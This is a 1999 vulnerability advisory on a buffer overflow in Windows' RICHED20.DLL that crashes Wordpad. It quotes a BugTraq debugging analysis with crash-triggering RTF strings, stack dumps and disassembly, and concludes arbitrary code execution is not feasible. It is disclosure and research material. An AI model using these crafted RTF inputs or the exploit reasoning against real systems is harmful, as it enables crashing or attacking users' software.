.DLL Buffer Overflow
Reported November 20, 1999 by
Pauli Ojanpera
VERSIONS EFFECTED
  • Microsoft"s RICHED20.DLL (namely, Wordpad)

DESCRIPTION

Windows 9x and NT ship with a built-in word processor (Wordpad,) which relies on RICHED20.DLL. The DLL has a overflow condition present when viewing Rich Text Files (.RTF) that can cause Wordpad to crash. However the vulnerability does not appear to offer a means of executing arbitrary code.

DEMONSTRATION

If a file called crashme.rtf  contains the following, Wordpad will crash:
\{\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\}

USSRLabs commented on this problem, stating that they see no way to exploit the problem. In backing up that assertion, USSRLabs said that the filtering in riched20.dll only accepts letters from "a" to "z" or "A" TO "Z", which limits the ability to change the return EIP address from 61616161 to 7a7a7a7a.

USSRLabs also said,

"I found one trick to get one, 0061616, of you put something like this in the rtf file:

00000000: 7B 5C 72 74-66 31 5C 61-61 61 61 61-61 61 61 61 \{\rtf1\aaaaaaaaa
00000010: 61 61 61 61-61 61 61 61-61 61 61 61-61 61 61 61 aaaaaaaaaaaaaaaa
00000020: 61 61 61 61-61 61 61 61-61 61 61 61-61 61 69 69 aaaaaaaaaaaaaaii
00000030: 69 00 69 69-69 5C 61 6E-73 69 63 70-67 31 32 35 i iii\ansicpg125
00000040: 32 5C 64 65-66 66 30 5C-64 65 66 6C-61 6E 67 31 2\deff0\deflang1

In the address 0000031, the "i iii", the zero is a non accepted character the filter of riched20.dll cut it, and story ends, in the overflow area appears like this,

69 69 00 48

and the eip is : EIP=48006969

you can change the file with bad characters " the filter cut it " and maybe you can get one,EIP LIKE 00616161, (I did it), but anyway, you have to think another good point, you are over the SEGMENT OF CODE, CS, if you can get any good EIP , you have to think you only can return over a segment of code of the riched20.dll, and if you search in the complete range of code/data of riched20.dll, no are anything like ours "aaaaaiii". story ends there...." - end quote.

A user known as Solar Eclipse provides extensive details and debugging infromation regarding this issue:

Quoting from the message as posted on BugTraq (with minor edits to replace profanity) :

I. Introduction

The first report was from Pauli Ojanpera <pauli_ojanpera@HOTMAIL.COM>

    Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer
    overflow problem with ".rtf"-files.

    Crashme.rtf :
    \{\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\}

    A malicious document may probably abuse this to execute arbitary
    code. WordPad crashes with EIP=41414141.

Thomas Dullien <dullien@GMX.DE> did a very good research on this
buffer overflow. Unfortunately I received his vuln-dev post after I
was deep into the Wordpad code, so I already discovered most of the
details that he posted.

II. Research

Ok, let"s try to exploit this stuff. First, try to crash Wordpad.
Create the following file:

\{\rtf\AAAAAAAAAA(100 "A"s)\}

I am using SoftIce to inspect the situation after the crash.
First, take a look at the registers and the stack.

EIP=61616161
ESP=0012F044
EBP=61616161
ebp eip
0023:0012F024 0012F104 00000102 61616161 61616161 ........aaaaaaaa
0023:0012F034 0000001B 00000246 0012F044 00000023 ....F...D...#...
0023:0012F044 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F054 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F064 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F074 61616161 61616161 00000000 00000000 aaaaaaaa........

We can assume that EBP and EIP were popped from the stack and then RET 10 was executed, decreasing the stack pointer.

To check if this is the case, try the following:

\{\rtf\AAAABBBBCCCCDDDDEEEEFFFF(...to ZZZZ)\}

Wordpad crashes again. The regiters and the stack are as follows:

ESP=0012F054
EBP=6A6A6A6A "jjjj"
EIP=6B6B6B6B "kkkk"

ebp eip
0023:0012F034 0012F114 00000102 6a6a6a6a 6b6b6b6b ........jjjjkkkk
0023:0012F044 0000001B 00000246 0012F054 00000023 ....F...D...#...
0023:0012F054 6C6C6C6C 6D6D6D6D 6E6E6E6E 6F6F6F6F llllmmmmnnnnoooo
0023:0012F064 70707070 71717171 72727272 73737373 ppppqqqqrrrrssss
0023:0012F074 74747474 75757575 76767676 77777777 ttttuuuuvvvvwwww
0023:0012F084 78787878 79797979 7A7A7A7A 00000200 xxxxyyyyzzzz....

Yes, our assumption was correct. EBP gets its value from 0012F03C, and the RET 10 instruction gets the EIP from 0012F040.

The buffer is probably 36 characters big, because "jjjj" overwrites it.
By the way, notice that the characters are lowercased. This means that the buffer is lowercased before the crash.

Let"s try the following file (36 characters):

\{\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII\}

It shouldn"t crash, but it does. This is strange. Take a look at the registers and the stack: (btw, do a quick check with 35 characters - Wordpad will not crash)

EIP=002E0033
ESP=0012F108
EBP=00200067

0023:0012F0E8 0012F294 6E002F02 00200067 002E0033 ...../.ng. .3...
0023:0012F0F8 0000001B 00000202 0012F108 00000023 ............#...
0023:0012F108 0020002E 006C0070 00610065 00650073 .. .p.l.e.a.s.e.
0023:0012F118 00770020 00690061 00000074 00000000 .w.a.i.t.......
0023:0012F128 00000000 00000000 0000002E 00000000 ................
0023:0012F138 0012F194 5F816876 00000014 00000000 ....vh._........
0023:0012F148 00000000 00000001 029AE0CD 00000064 ............d...
0023:0012F158 0012F1B8 0012F68C 0012F638 5F816850 ........8...Ph._
0023:0012F168 00C14812 00000000 0012F2A4 00000168 .H..........h...
0023:0012F178 0012F292 0012F290 00C15810 0012F1A8 .........X......
0023:0012F188 00C15B3A 00000007 00000006 0012F1CC :\[..............
0023:0012F198 6C026878 0012F294 0012F290 00C11DC8 xh.l............
0023:0012F1A8 61616161 62626262 63636363 64646464 aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868 eeeeffffgggghhhh
0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290 iii\}.....k.l....

This is even more strange. The EBP and EIP are not overwritten by our
string, but they are still smashed.

It"s time to try to find where exactly is the code, guilty for this mess. Notice that the EIP is overwritten and we don"t know what code was executed before the crash. Pauli Ojanpera posted that the crash was in riched20.dll. Check the loaded DLL-s: there is no riched20.dll, but we see riched32.dll. This sounds good! At what address is this DLL loaded?

:map32 riched32
Owner Obj Name Obj# Address Size Type
RICHED32 .text 0001 001B:6C001000 00027284 CODE RO

The code is loaded at 6C001000. Where is the buffer overflow? It is probably located in some function in RICHED32.DLL. This function is probably called >from some other function, which is also called from somewhere. We should be able to see the return addresses for these previous calls on the stack. Let"s search for something that looks like a return address. At 0012F1D0 we see the bytes 6C026B81. This looks like an address in RICHED32.DLL, doesn"t it? Go diassemble the thing!

It is part of a function, starting at 6C026B0B and ending at 6C026B68 (I incuded some more code in the middle, more about it later)

001B:6C026B0B push ebp
001B:6C026B0C mov ebp, esp
001B:6C026B0E sub esp, 04
...
001B:6C026B7A mox ecx, esi
001B:6C026B7C call 6C0267D1 ; this is called for each \ tag
001B:6C026B81 mov \[edi\], eax
...
001B:6C026B64 pop edi
001B:6C026B65 pop esi
001B:6C026B66 mov esp, ebp
001B:6C026B68 ret

Put a breakpoint in the beginning of this function and see what happens. The 6C026B0B function is called 2 times and crashes the second time. Trace it step by step, stepping over the calls. The function crashes after the final RET instruction (located at 6C026B68)

Just before the crash the stack lools like this:

edi esi local_var old_ebp
0023:0012F1D4 0012F290 00C13D58 5CC15A30 0012F40C
0023:0012F1E4 6C024DE0 <- ret address

The POP EDI and POP ESI instructions restore these two registers (look at the disassembly). Then the function restores the ESP (which is saved in EBP in the beginning of the function). By trying this with a normal RTF file (not causing a buffer overflow), we see that ESP becomes 0012F1E0. Then EBP is popped >from the stack (it becomes 0012F40C) and the RET instruction returnes the execution flow to 6C024DE0.

This is not the case with a messed up RTF file. Everything is ok until we hit the MOV ESP, EBP instruction. The value in the EBP register is not correct, thus screwing up the ESP and causing a mess.

Ok, now we need to find where in the 6C026B0B function the EBP is smashed. Put a breakpoint in the beginning of the function and trace it (without stepping into the calls). The EBP in the beginning of the function is 0012F1E0. It changes after the CALL 6C0267D1 instrcution.

Now we have the function that changes the EBP.

001B:6C0267D1 push ebp
001B:6C0267D2 mov ebp, esp
001B:6C0267D4 sub esp, 24
...

The stack of this function looks like this:

0023:0012F1A8 61616161 62626262 63636363 64646464 aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868 eeeeffffgggghhhh
0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290 iii\}.....k.l....
ebp eip

At 0012F1D4 we have the return address. The EBP is saved at 0012F1D0 and
then the stack pointer is decremented by 36, leaving space for 36 bytes of local variables. Remember this number? This is our buffer!

After some more tracing, we see that the saved ebp is changed because of
001B:6C0268E9 mov byte ptr \[ebx\], 00 executed right after the buffer is filled with our characters. This is a NULL termination of the string, which changes the saved ebp from 0012F1D0 to 0012F100.

Let"s do some more reverse engineering. From 6C0268AE to 6C0268DB we have a loop that reads our string and copies it into the buffer.

001B:6C0268AE mov al, \[ecx\] ; get the current char
001B:6C0268B0 inc ecx ; ecx points to the next char
001B:6C0268B1 mov \[ebp-01\], al ; store the current char at 0012F1C8
001B:6C0268B4 mov \[esi+1C\], ecx ; store ecx at 0012F2AC
001B:6C0268B7 mov eax, 00000001 ; what the heck?
001B:6C0268BC test eax, eax
001B:6C0268BE jc 6C0268E9 ; this is never executed
001B:6C0268C0 movzx eax, byte ptr \[ebp-01\] ; get the current char
001B:6C0268C4 test byte ptr \[eax+6C00C6B8\], 01 ; is is "A"-"Z" or "a"-"z" ?
001B:6C0268CB jz 6C0268E9 ; no -> go there
001B:6C0268CD mov al, \[ebp-01\] ; get the current char
001B:6C0268D0 or al, 20 ; make it lowercase
001B:6C0268D2 mov \[ebx\], al ; store it in the buffer
001B:6C0268D4 inc ebx
001B:6C0268D5 mov ecx, \[esi+1c\] ; restore ecx
001B:6C0268D8 cmp \[esi+18\], ecx ; reached the end of the sting?
001B:6C0268DB jnz 6C0268AE ; no -> loop again

ECX is a pointer to the memory location where the RTF file is loaded. It
points to the character that we are currently copying. EBX points to the
buffer. The buffer starts at 0012F1A8.

By the way, notice that the current charcacter is stored at 0012F1C8 (the third line in the disassembly). This means that out buffer is only 32 bytes long, and we have another local variable after it. This doesn"t really matter, because the copying process works even if we overwrite this variable (it gets restored). If we put some shellcode there, we need to know that this particular byte will be changed to the first character after the end of the string. In our case, this is "\}"

Notice the "test byte ptr \[eax+6C00C6B8\], 01" instruction. At this memory location (6C00C6B8) we have an array of bytes, corresponding to each ASCII value.

The array at 6C00C6B8
+00 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+10 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+20 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+30 06 06 06 06 06 06 06 06-06 06 00 00 00 00 00 00
+40 00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
+50 01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
+60 00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
+70 01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
+80 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+A0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+B0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+C0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+D0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00

The only ASCII characters that will pass the JZ condition after the TEST
instruction are the letters "A"-"Z" and "a"-"z" (ASCII values 41-5A and 61-7A). If any other character is reached, the copying is ended and the buffer is NULL terminated.

Next we try really taking over the return address.

\{\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKAAAAAAAAAAAAAAAAA(more As)\}

"jjjj" overwrites the saved EBP and the return address becomes "kkkk". After
the overwritten return address, we have more As.

0023:0012F1A8 61616161 62626262 63636363 64646464 aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868 eeeeffffgggghhhh
0023:0012F1C8 7D696969 70707070 71717171 61616161 iii\}jjjjkkkkaaaa
0023:0012F1D8 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F1E8 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F1F8 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F208 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F218 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F228 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F238 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F248 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F258 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F268 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F278 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F288 61616161 61616161 00000000 00000000 aaaaaaaa........
0023:0012F298 00000000 00000000 00000000 00000000 ................
0023:0012F2A8 00000000 000C1814 00000000 00000000 ................

At 0012F2AC we have a pointer to the current character in the file buffer. ECX is saved to this location (referenced as esi+1C) before the copying, and restored afterwards. This value is updated after every copied byte. If we overwrite it, it will start pointing to a new memory location. The copy loop will try to read the bytes to copy from there and probably crash. Even if we somehow manage to overwrite this with a valid memory pointer, this will be the last byte copied from our string.

This limits us to 216 "A"s after the "jjjjkkkk".

III. Is an exploit possible ?

Exploiting this buffer overflow will be hard. May be not impossible, but very hard. We have only 216 bytes to squeese our shell code in, and we can use 26 characters - the letters from "a" to "z".

Writing a shell code with no nulls is hard, writing one only with letters is almost impossible.

First, we need some way of pointing the return address to something usefull. We cannot point it to the stack, because the stack address contains "prohibited" characters. After the RET instruction the ESP points to the second part of our string (the one after "jjjjkkkk"). We need a JMP ESP or CALL ESP instruction. The usual approach is to look at the loaded DLL-s at the time of the crash and to find one of these instructions at some memory location. Then we can point the return address to this memory location and have it jump back to our shell
code. The problem is that we need the address of this memory location to
consist only of lowercase letters.

c:\>listdlls.exe wordpad

ListDLLs V2.1
Copyright (C) 1997-1999 Mark Russinovich
http://www.sysinternals.com
-----------------------------
WORDPAD.EXE pid: 275
Base Size Version Path
0x029a0000 0x34000 4.00.1381.0096 C:\Program Files\Windows NT\Accessories\wordpad.exe
0x77f60000 0x5e000 4.00.1381.0174 C:\WINNT\System32\ntdll.dll
0x5f800000 0xee000 4.21.0000.7160 C:\WINNT\System32\MFC42u.DLL
0x78000000 0x40000 6.00.8397.0000 C:\WINNT\system32\MSVCRT.dll
0x77f00000 0x5e000 4.00.1381.0178 C:\WINNT\system32\KERNEL32.dll
0x77ed0000 0x2c000 4.00.1381.0115 C:\WINNT\system32\GDI32.dll
0x77e70000 0x54000 4.00.1381.0133 C:\WINNT\system32\USER32.dll
0x77dc0000 0x3f000 4.00.1381.0203 C:\WINNT\system32\ADVAPI32.dll
0x77e10000 0x57000 4.00.1381.0193 C:\WINNT\system32\RPCRT4.dll
0x77d80000 0x32000 4.00.1381.0133 C:\WINNT\system32\comdlg32.dll
0x70970000 0x1a8000 4.72.3110.0006 C:\WINNT\system32\SHELL32.dll
0x70bd0000 0x44000 5.00.2314.1000 C:\WINNT\system32\SHLWAPI.dll
0x71590000 0x87000 5.80.2314.1000 C:\WINNT\system32\COMCTL32.dll
0x77b20000 0xb6000 4.00.1381.0190 C:\WINNT\system32\ole32.dll
0x76aa0000 0x6000 4.00.1371.0001 C:\WINNT\System32\INDICDLL.dll
0x77c00000 0x18000 4.00.1381.0027 C:\WINNT\System32\WINSPOOL.DRV
0x775a0000 0x14000 0.02.0000.0000 C:\WINNT\System32\spool\DRIVERS\W32X86\2\RASDDUI.DLL
0x6c000000 0x2e000 4.00.0993.0004 C:\WINNT\System32\RICHED32.dll
0x70400000 0x77000 5.00.2314.1000 C:\WINNT\System32\mlang.dll

These are the loaded DLLs that we can use. The perfect DLL would be the same on Windows 95, 98, SE, NT 4 with all service packs and on Win2K. Unfortunately such DLL is just a dream. Our choices are really limited. Looking at the base addresses, we can eliminate most of the DLLs, because they don"s have letter addresses. This leaves us only with one DLL that we can use:

0x71590000 0x87000 5.80.2314.1000 C:\WINNT\system32\COMCTL32.dll

We can only use the code in the range from from 71616161 to 7161707A. After disassembling the DLL and looking at the code, we clearly see that there is no JMP ESP or CALL ESP instruction.

There is no way to execute the shellcode.

Even if we could do it, making the shellcode do something usefull would be pain in the butt. The restrictions are too harsh.

After the RET instruction, at ESP-50 we have a pointer to the beginning of the buffer, where the raw file is loaded. This buffer holds the raw file contents, so we can use NULLs and non-letter characters. Unfortunately, this buffer is in the heap and we can not execute any code from there. We need to copy the code to the stack first." - end quote.


VENDOR RESPONSE

Microsoft is aware of this problem, however the vendor comment is known at the time of this writing.

CREDITS
Discovered by
Pauli Ojanpera
Posted here at NTSecurity.net on November 20, 1999